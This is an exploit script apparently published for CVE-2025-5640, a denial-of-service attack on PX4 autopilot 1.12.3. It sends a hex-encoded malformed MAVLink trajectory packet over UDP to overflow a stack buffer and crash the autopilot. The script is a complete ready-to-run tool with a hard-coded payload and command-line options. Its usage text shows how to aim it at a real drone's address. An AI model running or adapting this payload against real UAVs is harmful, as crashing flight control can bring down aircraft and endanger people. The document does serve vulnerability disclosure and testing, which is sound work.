# Exploit Title: PX4 Military UAV Autopilot 1.12.3 - Denial of Service (DoS) # Author: Mohammed Idrees Banyamer (@banyamer_security) # GitHub: https://github.com/mbanyamer # Date: 2025-06-21 # Tested on: Ubuntu 20.04 LTS + PX4 SITL (jMAVSim) # CVE: CVE-2025-5640 # Type: Denial of Service (DoS) via Buffer Overflow # Platform: Cross-platform (Military UAVs / PX4 SITL / Linux-based autopilot ground station) # Author Country: Jordan # Description: # A stack-based buffer overflow vulnerability in PX4 Military UAV Autopilot <=1.12.3 is triggered # when handling a malformed MAVLink message of type TRAJECTORY_REPRESENTATION_WAYPOINTS. # An attacker with access to the MAVLink communication channel can send a crafted packet # to crash the autopilot, potentially disrupting military UAV operations. This exploit demonstrates # a proof-of-concept that causes the PX4 autopilot to crash via UDP. import argparse import binascii from pymavlink import mavutil import sys # Exploit payload (malformed MAVLink hex) hex_payload = ( "fdef0000dcea6f4c01006de9d06a0548182a1fcc8b7cc542eb8945a54baa92ee908db9af0195bb5dce5f9ab613be912485d34e577c352" "c5cdc06592484be1aecd64a07127bda31fc8f41f300a9e4a0eab80d8835f106924f0b89ece3e256dda30e3001f07df4e1633e6f827b78" "12731dbc3daf1e81fc06cea4d9c8c1525fb955d3eddd7454b54bb740bcd87b00063bd9111d4fb4149658d4ccd92974c97c7158189a8d6" ) def connect_to_px4(ip, port, timeout, verbose=False): try: if verbose: print(f"[*] Connecting to PX4 at udp:{ip}:{port} ...") master = mavutil.mavlink_connection(f"udp:{ip}:{port}") master.wait_heartbeat(timeout=timeout) if verbose: print("[+] PX4 heartbeat received. Connection OK.") return master except Exception as e: print(f"[!] Error connecting to PX4: {e}") sys.exit(1) def send_dos_packet(master, verbose=False): try: payload = binascii.unhexlify(hex_payload) master.write(payload) print("[+] Exploit packet sent. Monitor PX4 for crash.") except Exception as e: print(f"[!] Failed to send payload: {e}") sys.exit(1) def main(): usage = """ PX4 Exploit Tool - CVE-2025-5640 ================================= Exploit a buffer overflow vulnerability in PX4 autopilot via MAVLink. USAGE: python3 px4_exploit_tool.py [OPTIONS] EXAMPLES: # Run DoS attack on default PX4 SITL python3 px4_exploit_tool.py --mode dos # Test connectivity to a real drone python3 px4_exploit_tool.py --mode check --ip 192.168.10.10 --port 14550 OPTIONS: --ip Target IP address (default: 127.0.0.1) --port Target UDP port (default: 14540) --mode Mode of operation: dos (default), check --timeout Timeout in seconds for heartbeat (default: 5) --verbose Enable verbose output """ parser = argparse.ArgumentParser( description="PX4 MAVLink DoS Exploit Tool (CVE-2025-5640) by @banyamer_security", epilog=usage, formatter_class=argparse.RawDescriptionHelpFormatter ) parser.add_argument("--ip", default="127.0.0.1", help="Target IP address (default: 127.0.0.1)") parser.add_argument("--port", type=int, default=14540, help="Target UDP port (default: 14540)") parser.add_argument("--timeout", type=int, default=5, help="Timeout in seconds for heartbeat (default: 5)") parser.add_argument("--mode", choices=["dos", "check"], default="dos", help="Mode: dos (default) or check connection") parser.add_argument("--verbose", action="store_true", help="Enable verbose output") args = parser.parse_args() master = connect_to_px4(args.ip, args.port, args.timeout, args.verbose) if args.mode == "check": print("[*] PX4 is alive. Connection test passed.") elif args.mode == "dos": send_dos_packet(master, args.verbose) if __name__ == "__main__": main()